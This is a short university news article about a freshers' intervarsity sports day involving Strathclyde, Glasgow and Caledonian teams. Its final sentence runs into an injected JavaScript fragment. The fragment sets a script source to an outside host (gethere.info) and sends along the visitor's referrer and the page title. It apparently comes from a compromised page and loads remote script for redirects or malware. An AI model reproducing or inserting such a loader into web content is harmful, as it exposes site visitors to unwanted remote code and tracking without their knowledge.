Intervarsity Success To Set Tone For Strathclyde

THE new term started in style for sports clubs at Strathclyde with the 9th Annual Freshers Intervarsity Sports Day going down as a huge success.

Teams from Strathclyde, Glasgow and Caledonian competed at various venues across Glasgow, with matches being played at Kelvin Hall, Garscube, Strathclyde’s CSR and Glasgow University pool.

The teams, made completely of Freshers, were involved in sports including, football, netball and swimming.

And although the tournament was played in good spirits, Strathclyde Sport Development Coordinator, Iain Stewart, hopes it can set the tone for the upcoming year at the university.

Iain said: “In order to keep with the ethos of fair play, the scores were not kept but if they were, then Strathclyde would have won more than they lost.

“Hopefully this can start a successful year for all sports clubs involved at the university.”

This is just the first of many great sports events throughout the year, so if you want to get involved yourself, the visit the Sports Union on Level 7 of the Union.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
